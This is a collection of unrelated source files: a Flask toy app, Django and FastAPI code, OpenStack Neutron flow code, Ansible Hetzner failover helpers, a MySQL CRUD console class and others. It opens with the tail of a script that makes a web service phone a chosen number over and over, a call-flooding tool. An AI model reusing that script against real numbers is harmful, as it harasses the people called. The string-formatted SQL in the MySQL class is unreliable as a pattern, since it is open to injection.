    are proposed for this routine -- only review notes.
    '''
    http_non_200 = 0
    while True:
        if http_non_200 > 3:
            # NOTE(review): the next line is a bare string literal, not a
            # Python 2 print statement, so the abort message is never shown
            # (it also contains the typo "reesponses"). The break still
            # fires, so the 4-failure abort itself works. Flagged, not fixed.
            "print [!] too many bad reesponses from server - aborting"
            break
        query_args = {
            "noArea" : number[:3],
            "noNumb" : number[3:],
            "noWhen" : 0,
        }
        data = urllib.urlencode(query_args)
        request = urllib2.Request("http://www.wheresmycellphone.com", data)
        response = urllib2.urlopen(request)
        if response.getcode() != 200:
            print "[!] non-OK response from server"
            http_non_200 += 1
        else:
            print "[i] successfully called %s" % number
        print "[i] sleeping for %s seconds" % wait
        time.sleep(wait)
def main():
    """Entry point: show usage with no arguments, otherwise dial forever.

    NOTE(review): invoking with exactly one argument raises IndexError,
    since this branch assumes both <number> and <delay> are present.
    """
    if len(sys.argv) == 1:
        usage()
    else:
        number = unicode(sys.argv[1])
        wait = int(sys.argv[2])
        call_forever(number,wait)
if __name__ == "__main__":
    main()  # run only when executed directly
6542744 | # Set up your imports here!
# import ...
from flask import Flask
app = Flask(__name__)
@app.route('/')
def index():
    """Landing page directing visitors to the /puppy_latin/<name> route."""
    welcome = "<h1>Welcome! Go to /puppy_latin/name to see your name in puppy latin!</h1>"
    return welcome
@app.route('/puppy_latin/<name>')
def puppylatin(name):
    """Greet *name* converted to puppy latin.

    Names ending in 'y' (any case) trade the 'y' for 'iful'; all other
    names simply gain a trailing 'y'.
    """
    lat_name = name[:-1] + 'iful' if name[-1].lower() == 'y' else name + 'y'
    return f"Hi {name}! Your puppy latin name is {lat_name}"
if __name__ == '__main__':
    # Run the Flask development server; the commented call below enables
    # debug mode while developing:
    #app.run(debug=True) for debug mode
    app.run()
| StarcoderdataPython |
3249328 | <reponame>ic-labs/django-icekit<filename>icekit_events/migrations/0007_type_fixtures.py<gh_stars>10-100
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
def make_type_fixtures(apps, _):
    """Seed the built-in non-public "education" and "members" event types."""
    EventType = apps.get_model("icekit_events", "EventType")
    for slug, title in (("education", "Education"), ("members", "Members")):
        # get_or_create keeps the migration idempotent on re-runs.
        EventType.objects.get_or_create(
            slug=slug,
            defaults=dict(title=title, is_public=False),
        )
def backwards(apps, _):
    # Intentionally a no-op: the seeded rows are left in place on unmigrate.
    pass
class Migration(migrations.Migration):
    # Data migration seeding the built-in EventType fixtures.
    dependencies = [
        ('icekit_events', '0006_auto_20161107_1747'),
    ]
    operations = [
        migrations.RunPython(make_type_fixtures, backwards)
    ]
| StarcoderdataPython |
1840950 | <reponame>gampel/neutron<filename>neutron/plugins/ofagent/agent/flows.py
# Copyright (C) 2014 VA Linux Systems Japan K.K.
# Copyright (C) 2014 <NAME> <yamamoto at valinux co jp>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
OpenFlow1.3 flow table for OFAgent
* requirements
** plain OpenFlow 1.3. no vendor extensions.
* legends
xxx: network id (agent internal use)
yyy: segment id (vlan id, gre key, ...)
a,b,c: tunnel port (tun_ofports, map[net_id].tun_ofports)
i,j,k: vm port (map[net_id].vif_ports[vif_id].ofport)
x,y,z: physical port (int_ofports)
N: tunnel type (0 for TYPE_GRE, 1 for TYPE_xxx, ...)
iii: unknown ip address
uuu: unicast l2 address
* tables (in order)
CHECK_IN_PORT
TUNNEL_IN+N
PHYS_IN
LOCAL_IN
ARP_PASSTHROUGH
ARP_RESPONDER
TUNNEL_OUT
LOCAL_OUT
PHYS_OUT
TUNNEL_FLOOD+N
PHYS_FLOOD
LOCAL_FLOOD
* CHECK_IN_PORT
for each vm ports:
// check_in_port_add_local_port, check_in_port_delete_port
in_port=i, write_metadata(LOCAL|xxx),goto(LOCAL_IN)
TYPE_GRE
for each tunnel ports:
// check_in_port_add_tunnel_port, check_in_port_delete_port
in_port=a, goto(TUNNEL_IN+N)
TYPE_VLAN
for each networks ports:
// provision_tenant_physnet, reclaim_tenant_physnet
in_port=x,vlan_vid=present|yyy, write_metadata(xxx),goto(PHYS_IN)
TYPE_FLAT
// provision_tenant_physnet, reclaim_tenant_physnet
in_port=x, write_metadata(xxx),goto(PHYS_IN)
default drop
* TUNNEL_IN+N (per tunnel types) tunnel -> network
for each networks:
// provision_tenant_tunnel, reclaim_tenant_tunnel
tun_id=yyy, write_metadata(xxx),goto(TUNNEL_OUT)
default drop
* PHYS_IN
default goto(TUNNEL_OUT)
* LOCAL_IN
default goto(next_table)
* ARP_PASSTHROUGH
for each unknown tpa:
// arp_passthrough
arp,arp_op=request,metadata=xxx,tpa=iii, idle_timeout=5, goto(TUNNEL_OUT)
default goto(next_table)
* ARP_RESPONDER
arp,arp_op=request, output:controller
default goto(next_table)
* TUNNEL_OUT
TYPE_GRE
// !FLOODING_ENTRY
// install_tunnel_output, delete_tunnel_output
metadata=LOCAL|xxx,eth_dst=uuu set_tunnel(yyy),output:a
default goto(next table)
* LOCAL_OUT
for each known destinations:
// local_out_add_port, local_out_delete_port
metadata=xxx,eth_dst=uuu output:i
default goto(next table)
* PHYS_OUT
NOTE(yamamoto): currently this table is always empty.
default goto(next table)
* TUNNEL_FLOOD+N. (per tunnel types)
network -> tunnel/vlan
output to tunnel/physical ports
"next table" might be LOCAL_OUT
TYPE_GRE
for each networks:
// FLOODING_ENTRY
// install_tunnel_output, delete_tunnel_output
metadata=LOCAL|xxx, set_tunnel(yyy),output:a,b,c,goto(next table)
default goto(next table)
* PHYS_FLOOD
TYPE_VLAN
for each networks:
// provision_tenant_physnet, reclaim_tenant_physnet
metadata=LOCAL|xxx, push_vlan:0x8100,set_field:present|yyy->vlan_vid,
output:x,pop_vlan,goto(next table)
TYPE_FLAT
for each networks:
// provision_tenant_physnet, reclaim_tenant_physnet
metadata=LOCAL|xxx, output:x,goto(next table)
default goto(next table)
* LOCAL_FLOOD
for each networks:
// local_flood_update, local_flood_delete
metadata=xxx, output:i,j,k
or
metadata=xxx,eth_dst=broadcast, output:i,j,k
default drop
* references
** OVS agent https://wiki.openstack.org/wiki/Ovs-flow-logic
*** we use metadata instead of "internal" VLANs
*** we don't want to use NX learn action
"""
from ryu.lib.packet import arp
from ryu.ofproto import ether
from neutron.plugins.common import constants as p_const
import neutron.plugins.ofagent.agent.metadata as meta
from neutron.plugins.ofagent.agent import ofswitch
from neutron.plugins.ofagent.agent import tables
class OFAgentIntegrationBridge(ofswitch.OpenFlowSwitch):
    """ofagent br-int specific logic.

    Installs and removes the OpenFlow 1.3 flows described in the module
    docstring above (table layout, metadata usage, legends).
    """

    def setup_default_table(self):
        """Wipe all flows and install the default entry of every table."""
        self.delete_flows()
        self.install_default_drop(tables.CHECK_IN_PORT)
        for t in tables.TUNNEL_IN.values():
            self.install_default_drop(t)
        self.install_default_goto(tables.PHYS_IN, tables.TUNNEL_OUT)
        self.install_default_goto_next(tables.LOCAL_IN)
        self.install_default_goto_next(tables.ARP_PASSTHROUGH)
        self.install_arp_responder(tables.ARP_RESPONDER)
        self.install_default_goto_next(tables.TUNNEL_OUT)
        self.install_default_goto_next(tables.LOCAL_OUT)
        self.install_default_goto_next(tables.PHYS_OUT)
        for t in tables.TUNNEL_FLOOD.values():
            self.install_default_goto_next(t)
        self.install_default_goto_next(tables.PHYS_FLOOD)
        self.install_default_drop(tables.LOCAL_FLOOD)

    def install_arp_responder(self, table_id):
        """Send ARP requests to the controller; everything else falls through."""
        (dp, ofp, ofpp) = self._get_dp()
        match = ofpp.OFPMatch(eth_type=ether.ETH_TYPE_ARP,
                              arp_op=arp.ARP_REQUEST)
        actions = [ofpp.OFPActionOutput(ofp.OFPP_CONTROLLER)]
        instructions = [
            ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]
        msg = ofpp.OFPFlowMod(dp,
                              table_id=table_id,
                              priority=1,
                              match=match,
                              instructions=instructions)
        self._send_msg(msg)
        self.install_default_goto_next(table_id)

    def install_tunnel_output(self, table_id,
                              network, segmentation_id,
                              ports, goto_next, **additional_matches):
        """Install a flow sending local traffic of *network* out *ports*.

        The tunnel id is set to *segmentation_id*; with ``goto_next`` the
        packet continues to the following table after being output.
        """
        (dp, ofp, ofpp) = self._get_dp()
        match = ofpp.OFPMatch(metadata=meta.mk_metadata(network, meta.LOCAL),
                              **additional_matches)
        actions = [ofpp.OFPActionSetField(tunnel_id=segmentation_id)]
        actions += [ofpp.OFPActionOutput(port=p) for p in ports]
        instructions = [
            ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
        ]
        if goto_next:
            instructions += [
                ofpp.OFPInstructionGotoTable(table_id=table_id + 1),
            ]
        msg = ofpp.OFPFlowMod(dp,
                              table_id=table_id,
                              priority=1,
                              match=match,
                              instructions=instructions)
        self._send_msg(msg)

    def delete_tunnel_output(self, table_id,
                             network, **additional_matches):
        """Remove the tunnel output flow(s) of *network* from *table_id*."""
        (dp, _ofp, ofpp) = self._get_dp()
        self.delete_flows(table_id=table_id,
                          metadata=meta.mk_metadata(network, meta.LOCAL),
                          **additional_matches)

    def provision_tenant_tunnel(self, network_type, network, segmentation_id):
        """Map incoming tunnel traffic (tun_id) to the network's metadata."""
        (dp, _ofp, ofpp) = self._get_dp()
        match = ofpp.OFPMatch(tunnel_id=segmentation_id)
        metadata = meta.mk_metadata(network)
        instructions = [
            ofpp.OFPInstructionWriteMetadata(metadata=metadata[0],
                                             metadata_mask=metadata[1]),
            ofpp.OFPInstructionGotoTable(table_id=tables.TUNNEL_OUT),
        ]
        msg = ofpp.OFPFlowMod(dp,
                              table_id=tables.TUNNEL_IN[network_type],
                              priority=1,
                              match=match,
                              instructions=instructions)
        self._send_msg(msg)

    def reclaim_tenant_tunnel(self, network_type, network, segmentation_id):
        """Remove the tunnel-in mapping installed by provision_tenant_tunnel."""
        table_id = tables.TUNNEL_IN[network_type]
        self.delete_flows(table_id=table_id, tunnel_id=segmentation_id)

    def provision_tenant_physnet(self, network_type, network,
                                 segmentation_id, phys_port):
        """Install inbound and outbound flows for a vlan or flat network."""
        assert(network_type in [p_const.TYPE_VLAN, p_const.TYPE_FLAT])
        (dp, ofp, ofpp) = self._get_dp()
        # inbound: tag incoming physical traffic with the network metadata
        metadata = meta.mk_metadata(network)
        instructions = [
            ofpp.OFPInstructionWriteMetadata(metadata=metadata[0],
                                             metadata_mask=metadata[1])
        ]
        if network_type == p_const.TYPE_VLAN:
            vlan_vid = segmentation_id | ofp.OFPVID_PRESENT
            match = ofpp.OFPMatch(in_port=phys_port, vlan_vid=vlan_vid)
            actions = [ofpp.OFPActionPopVlan()]
            instructions += [ofpp.OFPInstructionActions(
                ofp.OFPIT_APPLY_ACTIONS, actions)]
        else:
            match = ofpp.OFPMatch(in_port=phys_port)
        instructions += [ofpp.OFPInstructionGotoTable(table_id=tables.PHYS_IN)]
        msg = ofpp.OFPFlowMod(dp,
                              priority=1,
                              table_id=tables.CHECK_IN_PORT,
                              match=match,
                              instructions=instructions)
        self._send_msg(msg)
        # outbound: push the vlan tag (if any), output, then pop it again so
        # the packet continues untagged to the next table
        match = ofpp.OFPMatch(metadata=meta.mk_metadata(network, meta.LOCAL))
        if network_type == p_const.TYPE_VLAN:
            actions = [
                ofpp.OFPActionPushVlan(),
                ofpp.OFPActionSetField(vlan_vid=vlan_vid),
            ]
        else:
            actions = []
        actions += [ofpp.OFPActionOutput(port=phys_port)]
        if network_type == p_const.TYPE_VLAN:
            actions += [ofpp.OFPActionPopVlan()]
        instructions = [
            ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
            ofpp.OFPInstructionGotoTable(table_id=tables.PHYS_FLOOD + 1),
        ]
        msg = ofpp.OFPFlowMod(dp,
                              priority=1,
                              table_id=tables.PHYS_FLOOD,
                              match=match,
                              instructions=instructions)
        self._send_msg(msg)

    def reclaim_tenant_physnet(self, network_type, network,
                               segmentation_id, phys_port):
        """Remove the flows installed by provision_tenant_physnet."""
        (_dp, ofp, _ofpp) = self._get_dp()
        if network_type == p_const.TYPE_VLAN:
            # Fixed: vlan_vid used to be computed unconditionally, which
            # raised TypeError for flat networks where segmentation_id is
            # None. Only VLAN networks need (or have) a vid.
            vlan_vid = segmentation_id | ofp.OFPVID_PRESENT
            self.delete_flows(table_id=tables.CHECK_IN_PORT,
                              in_port=phys_port, vlan_vid=vlan_vid)
        else:
            self.delete_flows(table_id=tables.CHECK_IN_PORT,
                              in_port=phys_port)
        self.delete_flows(table_id=tables.PHYS_FLOOD,
                          metadata=meta.mk_metadata(network))

    def check_in_port_add_tunnel_port(self, network_type, port):
        """Route packets from a tunnel port to the matching TUNNEL_IN table."""
        (dp, _ofp, ofpp) = self._get_dp()
        match = ofpp.OFPMatch(in_port=port)
        instructions = [
            ofpp.OFPInstructionGotoTable(
                table_id=tables.TUNNEL_IN[network_type])
        ]
        msg = ofpp.OFPFlowMod(dp,
                              table_id=tables.CHECK_IN_PORT,
                              priority=1,
                              match=match,
                              instructions=instructions)
        self._send_msg(msg)

    def check_in_port_add_local_port(self, network, port):
        """Tag packets from a local VM port with LOCAL|network metadata."""
        (dp, ofp, ofpp) = self._get_dp()
        match = ofpp.OFPMatch(in_port=port)
        metadata = meta.mk_metadata(network, meta.LOCAL)
        instructions = [
            ofpp.OFPInstructionWriteMetadata(metadata=metadata[0],
                                             metadata_mask=metadata[1]),
            ofpp.OFPInstructionGotoTable(table_id=tables.LOCAL_IN),
        ]
        msg = ofpp.OFPFlowMod(dp,
                              table_id=tables.CHECK_IN_PORT,
                              priority=1,
                              match=match,
                              instructions=instructions)
        self._send_msg(msg)

    def check_in_port_delete_port(self, port):
        """Remove the CHECK_IN_PORT entry for *port* (tunnel or local)."""
        self.delete_flows(table_id=tables.CHECK_IN_PORT, in_port=port)

    def local_flood_update(self, network, ports, flood_unicast):
        """Install the local flood entry for *network*.

        With *flood_unicast* every frame is flooded to *ports*; otherwise
        only multicast/broadcast frames are.  The complementary entry is
        deleted so exactly one of the two matches remains installed.
        """
        (dp, ofp, ofpp) = self._get_dp()
        match_all = ofpp.OFPMatch(metadata=meta.mk_metadata(network))
        match_multicast = ofpp.OFPMatch(metadata=meta.mk_metadata(network),
                                        eth_dst=('01:00:00:00:00:00',
                                                 '01:00:00:00:00:00'))
        if flood_unicast:
            match_add = match_all
            match_del = match_multicast
        else:
            match_add = match_multicast
            match_del = match_all
        actions = [ofpp.OFPActionOutput(port=p) for p in ports]
        instructions = [
            ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
        ]
        msg = ofpp.OFPFlowMod(dp,
                              table_id=tables.LOCAL_FLOOD,
                              priority=1,
                              match=match_add,
                              instructions=instructions)
        self._send_msg(msg)
        self.delete_flows(table_id=tables.LOCAL_FLOOD, strict=True,
                          priority=1, match=match_del)

    def local_flood_delete(self, network):
        """Remove all local flood entries for *network*."""
        self.delete_flows(table_id=tables.LOCAL_FLOOD,
                          metadata=meta.mk_metadata(network))

    def local_out_add_port(self, network, port, mac):
        """Deliver frames for *mac* on *network* directly to *port*."""
        (dp, ofp, ofpp) = self._get_dp()
        match = ofpp.OFPMatch(metadata=meta.mk_metadata(network), eth_dst=mac)
        actions = [ofpp.OFPActionOutput(port=port)]
        instructions = [
            ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
        ]
        msg = ofpp.OFPFlowMod(dp,
                              table_id=tables.LOCAL_OUT,
                              priority=1,
                              match=match,
                              instructions=instructions)
        self._send_msg(msg)

    def local_out_delete_port(self, network, mac):
        """Remove the direct-delivery entry for *mac* on *network*."""
        self.delete_flows(table_id=tables.LOCAL_OUT,
                          metadata=meta.mk_metadata(network), eth_dst=mac)

    def arp_passthrough(self, network, tpa):
        """Let ARP requests for an unknown *tpa* bypass the ARP responder.

        The entry expires after 5 seconds of inactivity (idle_timeout).
        """
        (dp, ofp, ofpp) = self._get_dp()
        match = ofpp.OFPMatch(metadata=meta.mk_metadata(network),
                              eth_type=ether.ETH_TYPE_ARP,
                              arp_op=arp.ARP_REQUEST,
                              arp_tpa=tpa)
        instructions = [
            ofpp.OFPInstructionGotoTable(table_id=tables.TUNNEL_OUT)]
        msg = ofpp.OFPFlowMod(dp,
                              table_id=tables.ARP_PASSTHROUGH,
                              priority=1,
                              idle_timeout=5,
                              match=match,
                              instructions=instructions)
        self._send_msg(msg)
| StarcoderdataPython |
3395587 | <gh_stars>0
from datetime import datetime, date
from decimal import Decimal
from typing import Optional, List
from fastapi import APIRouter, Depends
from sqlmodel import Field, SQLModel
from ...db import get_session
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession
router = APIRouter()
class HistoryChiefComplaint(SQLModel, table=True):
    """ORM/schema model for one chief-complaint entry of a patient history."""
    id: Optional[int] = Field(default=None, primary_key=True)
    # Id of the parent history record — presumably a foreign key to a
    # `history` table; no FK constraint is declared here (TODO confirm).
    history_id: int
    # Free-text description of the complaint.
    detail: str
    created_at: datetime
    updated_at: datetime
    # User ids of creator / last editor; updated_by stays None until an edit.
    created_by: int
    updated_by: Optional[int] = None
@router.post("/history_chief_complaint", response_model=HistoryChiefComplaint)
async def create_history_chief_complaint(history_chief_complaint: HistoryChiefComplaint, session: AsyncSession = Depends(get_session)):
session.add(history_chief_complaint)
await session.commit()
await session.refresh(history_chief_complaint)
return history_chief_complaint
@router.get("/history_chief_complaint/{id}", response_model=HistoryChiefComplaint)
async def get_history_chief_complaint(id: int, session: AsyncSession = Depends(get_session)):
history_chief_complaints = await session.execute(select(HistoryChiefComplaint).where(HistoryChiefComplaint.id == id))
history_chief_complaint = history_chief_complaints.scalars().first()
return history_chief_complaint
@router.put("/history_chief_complaint/{id}", response_model=HistoryChiefComplaint)
async def update_history_chief_complaint(id: int, session: AsyncSession = Depends(get_session)):
return None
@router.delete("/history_chief_complaint/{id}")
async def delete_history_chief_complaint(session: AsyncSession = Depends(get_session)):
return None | StarcoderdataPython |
6559865 | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Product(models.Model):
    """A submitted ("hunted") product with its image, link and publisher."""
    title = models.CharField(max_length=255)
    pub_date = models.DateTimeField()
    url = models.TextField()
    image = models.ImageField(upload_to='images/')
    # The user who submitted the product; its products are deleted with it.
    hunter = models.ForeignKey(User, on_delete=models.CASCADE)

    def __str__(self):
        return self.title

    def summary(self):
        """Return the first 100 characters of the title."""
        return self.title[:100]

    def pub_date_pretty(self):
        """Format pub_date like 'Jan  5 2020'.

        NOTE(review): '%e' (space-padded day) is a glibc strftime extension
        and is not portable to Windows — confirm the deployment platform.
        FIX: removed dataset-marker residue fused onto this return statement.
        """
        return self.pub_date.strftime('%b %e %Y')
5092145 | <filename>venv/lib/python3.6/site-packages/ansible_collections/community/hrobot/plugins/module_utils/failover.py
# -*- coding: utf-8 -*-
# Copyright (c), <NAME> <<EMAIL>>, 2019
# Simplified BSD License (see licenses/simplified_bsd.txt or https://opensource.org/licenses/BSD-2-Clause)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import json
from ansible.module_utils.six.moves.urllib.parse import urlencode
from ansible_collections.community.hrobot.plugins.module_utils.robot import (
BASE_URL,
fetch_url_json,
)
def get_failover_record(module, ip):
    '''
    Fetch the full information record of a failover IP.

    Fails the module (fail_json) when the response has no 'failover' key.
    See https://robot.your-server.de/doc/webservice/en.html#get-failover-failover-ip
    '''
    endpoint = "{0}/failover/{1}".format(BASE_URL, ip)
    data, _err = fetch_url_json(module, endpoint)
    if 'failover' not in data:
        module.fail_json(msg='Cannot interpret result: {0}'.format(json.dumps(data, sort_keys=True)))
    return data['failover']
def get_failover(module, ip):
    '''
    Return the current routing target of a failover IP (``None`` = unrouted).

    See https://robot.your-server.de/doc/webservice/en.html#get-failover-failover-ip
    '''
    record = get_failover_record(module, ip)
    return record['active_server_ip']
def set_failover(module, ip, value, timeout=180):
    '''
    Route (or, when *value* is ``None``, unroute) the failover IP *ip*.

    Return a pair ``(value, changed)``; ``changed`` is False when the robot
    reports FAILOVER_ALREADY_ROUTED.

    See https://robot.your-server.de/doc/webservice/en.html#post-failover-failover-ip
    and https://robot.your-server.de/doc/webservice/en.html#delete-failover-failover-ip
    '''
    url = "{0}/failover/{1}".format(BASE_URL, ip)
    tolerated = ['FAILOVER_ALREADY_ROUTED']
    if value is None:
        # Unrouting is a plain DELETE request.
        result, error = fetch_url_json(
            module,
            url,
            method='DELETE',
            timeout=timeout,
            accept_errors=tolerated
        )
    else:
        # Routing posts the target address as a form-encoded body.
        form_body = urlencode(dict(active_server_ip=value))
        result, error = fetch_url_json(
            module,
            url,
            method='POST',
            timeout=timeout,
            data=form_body,
            headers={"Content-type": "application/x-www-form-urlencoded"},
            accept_errors=tolerated
        )
    if error is None:
        return result['failover']['active_server_ip'], True
    return value, False
def get_failover_state(value):
    '''
    Build the result dictionary for a failover IP's routing target.

    ``None`` (and any other falsy value) is reported as 'unrouted'.
    '''
    return {
        'value': value,
        'state': 'routed' if value else 'unrouted',
    }
| StarcoderdataPython |
4836785 | from connect_Db import Connect_db
import mysql.connector
from termcolor import colored
from prettytable import PrettyTable
from Validation import Validations
from os import system
class Tb_profil:
    """CRUD console helper for the `profil` MySQL table.

    Fixes vs. previous revision: removed dataset-marker residue fused onto
    the final line (caused a NameError); comments translated to English.
    NOTE(review): edit/delete/search build SQL via string formatting; the id
    values come from validation_Int so injection risk is limited, but
    parameterized queries (execute(sql, params)) would be preferable.
    """
    # Shared validator and connection factory, created once at class definition.
    Valid = Validations()
    conn = Connect_db()
    # Display data. The single argument `noid` doubles as a mode switch:
    # noid == 1 shows the whole table, any other value shows that one row.
    # The value 1 comes from the menu input in main()'s show_menu().
    def show_Profil(self, noid):
        # conn.con() returns a fresh DB connection; `conn` is a class-level
        # attribute, so it is reached through self.
        self.Mydb = self.conn.con()
        # cursor() is the mysql.connector handle used to execute statements.
        self.cursor = self.Mydb.cursor()
        if(noid == 1):
            # Query that lists the whole table.
            sql = "SELECT * FROM profil"
            print("Tampil Profil")
            print("**************")
        else:
            # Query for a single row selected by id.
            sql = "SELECT * FROM profil WHERE id ={} LIMIT 1".format(noid)
            print("Tampil Profil No Id : {}".format(noid))
            print("**************")
        try:
            self.cursor.execute(sql)
            # PrettyTable renders the result set as an aligned ASCII table.
            t = PrettyTable(['No Id','Nama', 'Alamat', 'Jenis Kelamin'])
            # Stream rows from the cursor into the table.
            for (no_id,nama, alamat, jenis_kelamin) in self.cursor:
                t.add_row([no_id,nama, alamat, jenis_kelamin])
            print(t)
        except mysql.connector.ProgrammingError as err:
            print (colored("Class Tb_profil -> {}".format(err.msg),"red"))
            exit()
        except mysql.connector.Error as err:
            print (colored("Class Tb_profil -> {}".format(err.msg),"red"))
            exit()
        # On success or failure, always release the cursor and connection.
        finally:
            self.cursor.close()
            self.Mydb.close()
    # Insert a new row gathered interactively from the user.
    def insert_Profil(self):
        self.Mydb = self.conn.con()
        self.cursor = self.Mydb.cursor()
        print("Tambah Profil")
        print("**************")
        # Collect and validate each field before touching the database.
        self.nama = self.Valid.validation_String("Nama : ",True)
        self.alamat = self.Valid.validation_String("Alamat : ", True)
        self.jenis_kelamin = self.Valid.validation_StringOption("Jenis Kelamin [L/P] : ", True, "L","P")
        system("cls")
        # Parameterized INSERT — values are bound by the driver, not formatted in.
        sql = ("INSERT INTO profil "
               "(nama, alamat, jenis_kelamin) "
               "VALUES (%s, %s, %s)")
        values = (self.nama, self.alamat, self.jenis_kelamin)
        try:
            self.cursor.execute(sql, values)
            # Persist the insert.
            self.Mydb.commit()
            print(colored("\n{} Record has been successfully inserted".format(self.cursor.rowcount),"green"))
        # On any failure the transaction is rolled back before exiting.
        except (mysql.connector.IntegrityError, mysql.connector.DataError) as err:
            print (colored("Class Tb_profil -> Insert failed in atribute class Tb_profil, typo or incomplete -> {}".format(err),"red"))
            self.Mydb.rollback()
            exit()
        except mysql.connector.ProgrammingError as err:
            print (colored("Class Tb_profil -> Insert failed in values, typo or incomplete -> {}".format(err),"red"))
            self.Mydb.rollback()
            exit()
        except mysql.connector.Error as err:
            print (colored("Class Tb_profil -> {}".format(err.msg),"red"))# error message
            self.Mydb.rollback()
            exit()
        # Always release the cursor and connection.
        finally:
            self.cursor.close()
            self.Mydb.close()
    # Prompt until the user enters an id that exists; edit/delete use the
    # returned id to identify the row they operate on.
    def search_Id(self):
        while True:
            self.Mydb = self.conn.con()
            self.cursor = self.Mydb.cursor()
            self.id = self.Valid.validation_Int("No Id : ", True)
            sql = "SELECT id FROM profil WHERE id = {}".format(self.id )
            try:
                self.cursor.execute(sql)
                # Consume the result set so cursor.rowcount reflects the rows
                # actually returned (it is -1 until rows are fetched).
                for i in self.cursor:
                    i
                if(self.cursor.rowcount < 1):
                    print("No id tidak ditemukan")
                else:
                    system("cls")
                    return self.id
            except mysql.connector.ProgrammingError as err:
                print (colored("Class Tb_profil -> {}".format(err.msg),"red"))
                exit()
            except mysql.connector.Error as err:
                print (colored("Class Tb_profil -> {}".format(err.msg),"red"))
                exit()
            # Always release the cursor and connection.
            finally:
                self.cursor.close()
                self.Mydb.close()
    # Edit an existing row selected via search_Id().
    def edit_Profil(self):
        # search_Id() validates the id; show_Profil() previews the row.
        self.id = self.search_Id()
        self.show_Profil(self.id)
        print("\nEdit profil : {}".format(self.id))
        print("**************")
        self.Mydb = self.conn.con()
        self.cursor = self.Mydb.cursor()
        self.nama = self.Valid.validation_String("Nama : ",True)
        self.alamat = self.Valid.validation_String("Alamat : ", True)
        self.jenis_kelamin = self.Valid.validation_StringOption("Jenis Kelamin [L/P] : ", True, "L","P")
        system("cls")
        # UPDATE built by %-formatting; see class NOTE about parameterization.
        sql = ("UPDATE profil SET nama='%s', alamat='%s', jenis_kelamin='%s' WHERE id ='%s'" % (self.nama, self.alamat, self.jenis_kelamin, self.id))
        try:
            self.cursor.execute(sql)
            self.Mydb.commit()
            print(colored("\n{} Record has been successfully Update".format(self.cursor.rowcount),"green"))
        except (mysql.connector.IntegrityError, mysql.connector.DataError) as err:
            print (colored("Class Tb_profil -> Update failed in atribute class Tb_profil, typo or incomplete -> {}".format(err),"red"))
            self.Mydb.rollback()
            exit()
        except mysql.connector.ProgrammingError as err:
            print (colored("Class Tb_profil -> Update failed in values, typo or incomplete -> {}".format(err),"red"))
            self.Mydb.rollback()
            exit()
        except mysql.connector.Error as err:
            print (colored("Class Tb_profil -> {}".format(err.msg),"red"))# error message
            self.Mydb.rollback()
            exit()
        # Always release the cursor and connection.
        finally:
            self.cursor.close()
            self.Mydb.close()
    # Delete a row selected via search_Id(), after an explicit confirmation.
    def delete_Profil(self):
        self.id = self.search_Id()
        self.show_Profil(self.id)
        print("\nDelete profil")
        print("**************")
        self.confirm = self.Valid.validation_ConfirmDelete("Apakah yakin ingin menghapus No id {}? [Y/T] : ".format(self.id), True, "Y", "T")
        if (self.confirm == "Y"):
            self.Mydb = self.conn.con()
            self.cursor = self.Mydb.cursor()
            sql = ("DELETE FROM profil WHERE id = '%s'" % (self.id))
            try:
                self.cursor.execute(sql)
                self.Mydb.commit()
                print(colored("\n{} Record has been successfully Delete".format(self.cursor.rowcount),"green"))
            except (mysql.connector.IntegrityError, mysql.connector.DataError) as err:
                print (colored("Class Tb_profil -> Delete failed in atribute class Tb_profil, typo or incomplete -> {}".format(err),"red"))
                self.Mydb.rollback()
                exit()
            except mysql.connector.ProgrammingError as err:
                print (colored("Class Tb_profil -> Delete failed in values, typo or incomplete -> {}".format(err),"red"))
                self.Mydb.rollback()
                exit()
            except mysql.connector.Error as err:
                print (colored("Class Tb_profil -> {}".format(err.msg),"red"))# error message
                self.Mydb.rollback()
                exit()
            # Always release the cursor and connection.
            finally:
                self.cursor.close()
                self.Mydb.close()
        else:
            print("No id {} tidak di hapus".format(self.id))
8125162 | import numpy as np
from ._single_layer_model import SingleLayerModel
from ._classifier import Classifier
from . import _functions
class LogisticRegression(SingleLayerModel, Classifier):
    '''
    Logistic regression for classification, built on the single-layer model base.

    Uses sigmoid + its derivative when output_size == 1 (binary case) and
    softmax + its derivative otherwise (multiclass case); the cost is always
    cross-entropy.

    FIX: removed dataset-marker residue (`| StarcoderdataPython |`) that was
    fused onto the final return statement.
    '''

    def __init__(self, input_size, output_size, reg_param=0):
        """Initialize the base model and pick the output activation by class count."""
        super(LogisticRegression, self).__init__(input_size, output_size, reg_param)
        if output_size == 1:
            # Binary classification.
            self._afunc = _functions.sigmoid
            self._afunc_prime = _functions.sigmoid_prime
        else:
            # Multiclass classification.
            self._afunc = _functions.softmax
            self._afunc_prime = _functions.softmax_prime

    @property
    def _activ_func(self):
        # Output activation chosen in __init__.
        return self._afunc

    @property
    def _activ_func_prime(self):
        # Derivative of the chosen activation.
        return self._afunc_prime

    @property
    def _cost_func(self):
        return _functions.cross_entropy

    @property
    def _cost_func_prime(self):
        return _functions.cross_entropy_prime
class OECS(object):
    """Top-level game driver wiring an SFML window to the entity/system/input managers.

    Fixes vs. previous revision: stripped dataset-marker residue from the
    class line and render_frame; repaired `self._self._system_manager`
    (AttributeError on every construction); removed a loop over an undefined
    `lNextState` in the window-close branch (NameError on close).
    """
    def __init__(self, window, view, state_loader, entity_manager, system_manager, input_manager, asset_manager):
        """
        @param window The SFML window object that the state is to be loaded onto.
        @param view SFML View used to zoom in on what a certain state shows
        (can be specified in xml data).
        @param state_loader The loader for the next state's entities, systems, inputs and assets.
